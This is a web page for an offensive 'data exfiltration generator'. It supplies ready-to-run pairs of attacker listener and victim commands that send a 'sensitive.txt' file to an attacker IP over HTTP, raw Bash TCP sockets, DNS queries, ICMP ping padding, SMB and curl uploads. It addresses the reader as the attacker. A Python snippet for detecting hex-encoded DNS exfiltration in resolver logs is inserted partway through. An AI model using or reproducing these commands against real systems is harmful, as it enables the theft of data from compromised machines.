Interactive Tool

Data Exfiltration Generator

Configure your listener details below to generate ready-to-use exfiltration commands. Filter by OS and protocol to find the best technique for your scenario.

OpSec Warning

DNS and ICMP tunneling are extremely noisy and easily detected by modern EDR/IDS solutions. Prefer encrypted channels (HTTPS) or legitimate cloud services where possible.

🎓 How to use this tool

Data exfiltration is the process of moving data from a compromised machine (the victim) to your machine (the attacker).

  1. Configure your IP: Enter your attacker IP address (LHOST) below. This is where the data will be sent.
  2. Set up a Listener: Before running any command on the victim, you must start a "listener" on your machine to receive the data. Look for the 1. ATTACKER LISTENER box in each card.
  3. Run the Payload: Copy the command from the 2. VICTIM COMMAND box and run it on the target machine.

⚙️ Configuration

PowerShell Invoke-WebRequest

LOW STEALTH | HTTP

Standard HTTP POST exfiltration. Fast but logs to PowerShell history and easily flagged.

💡 Tip: Run the listener command on your attacker machine first. The file content will be saved to data.txt.
1. Attacker Listener (Run this first)
nc -lvnp 8000 > data.txt
2. Victim Command (Run on target)
$data = Get-Content ".\sensitive.txt" -Raw
Invoke-WebRequest -Uri "http://10.10.14.5:8000/exfil" -Method POST -Body $data

Bash TCP Redirect

MEDIUM STEALTH | TCP

Native Bash feature. Very fast, creates a direct socket connection.

💡 Tip: This uses the built-in /dev/tcp device file in Linux. No special tools needed on the victim.
1. Attacker Listener (Run this first)
nc -lvnp 8000 > data.txt
2. Victim Command (Run on target)
cat sensitive.txt > /dev/tcp/10.10.14.5/8000

Manual DNS Exfiltration

HIGH STEALTH | DNS

Encodes file line-by-line into DNS queries. Bypasses most firewalls but very slow and noisy in logs.

💡 Tip: You will see the file content (hex encoded) in your DNS logs. You need to reassemble it later.
1. Attacker Listener (Run this first)
tcpdump -i eth0 udp port 53
2. Victim Command (Run on target)
# Linux/Bash
for line in $(cat sensitive.txt | xxd -p); do dig $line.exfil.10.10.14.5; done
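
From the defender's side, the query pattern this card produces (a run of long, all-hex leftmost labels under one parent name, all from a single client) is straightforward to find in resolver logs. The following is an added example, not part of the original tool; the log format, the client addresses and the function name `find_hex_dns_bursts` are assumptions, and the sample log lines are constructed.

```python
import re
from collections import defaultdict

# Constructed resolver log, format "<time> <client> <qname> <qtype>" (assumed).
# The parent name exfil.10.10.14.5 is the one used in the card above.
SAMPLE_LOG = """\
12:00:01 10.0.0.23 www.example.com A
12:00:02 10.0.0.23 6163636f756e743d31323334.exfil.10.10.14.5 A
12:00:02 10.0.0.23 70617373776f72643d68756e74657232.exfil.10.10.14.5 A
12:00:03 10.0.0.23 70617373776f72643d68756e74657232.exfil.10.10.14.5 A
12:00:03 10.0.0.23 6b65793d736563726574310a.exfil.10.10.14.5 A
12:00:04 10.0.0.41 d3b07384d113edec.cdn.example.net A
12:00:05 10.0.0.41 deadbeef.example.org A
"""

# Leftmost label that is entirely hex and at least 8 bytes long (63 is the DNS label limit).
HEX_LABEL = re.compile(r"^[0-9a-f]{16,63}$")


def find_hex_dns_bursts(log_text, min_labels=3):
    """Group hex-looking leftmost labels by (client, parent name).

    Returns {(client, parent): {"labels": n, "bytes": m}} for every pair with
    at least min_labels distinct labels; m estimates the decoded data volume.
    """
    seen = defaultdict(set)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip malformed lines
        _, client, qname, _ = parts
        label, _, parent = qname.lower().rstrip(".").partition(".")
        # Even length is required for the label to be whole hex-encoded bytes.
        if parent and HEX_LABEL.match(label) and len(label) % 2 == 0:
            seen[(client, parent)].add(label)  # set: retries count once
    return {
        key: {"labels": len(labels), "bytes": sum(len(l) // 2 for l in labels)}
        for key, labels in seen.items()
        if len(labels) >= min_labels  # one hashed CDN hostname stays below this
    }


if __name__ == "__main__":
    for (client, parent), stats in find_hex_dns_bursts(SAMPLE_LOG).items():
        print(f"{client} -> *.{parent}: {stats['labels']} hex labels, ~{stats['bytes']} bytes")
```

The minimum label length and the distinct-label threshold need tuning against the resolver's normal traffic before this is used for alerting.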

ICMP Ping Exfiltration

MEDIUM STEALTH | ICMP

Hides data inside ICMP echo request payloads.

💡 Tip: Data is hidden in the padding of the ping packet. Use Wireshark or tcpdump to capture it.
1. Attacker Listener (Run this first)
tcpdump -i eth0 icmp
2. Victim Command (Run on target)
cat sensitive.txt | xxd -p -c 16 | while read line; do ping -c 1 -p $line 10.10.14.5; done

SMB Copy

LOW STEALTH | SMB

Simple copy to a share. Requires outbound SMB (445) allowed.

💡 Tip: This creates a fake shared folder on your attacker machine. The victim copies the file to it.
1. Attacker Listener (Run this first)
impacket-smbserver share . -smb2support
2. Victim Command (Run on target)
copy "sensitive.txt" \\10.10.14.5\share\

Curl Upload

MEDIUM STEALTH | HTTP

Standard file upload using curl.

💡 Tip: Standard HTTP upload. Requires a web server on your end that accepts file uploads (e.g., a simple PHP script).
1. Attacker Listener (Run this first)
python3 -m http.server 8000 (for download) / Custom PHP script for upload
2. Victim Command (Run on target)
curl -F "file=@sensitive.txt" http://10.10.14.5:8000/upload.php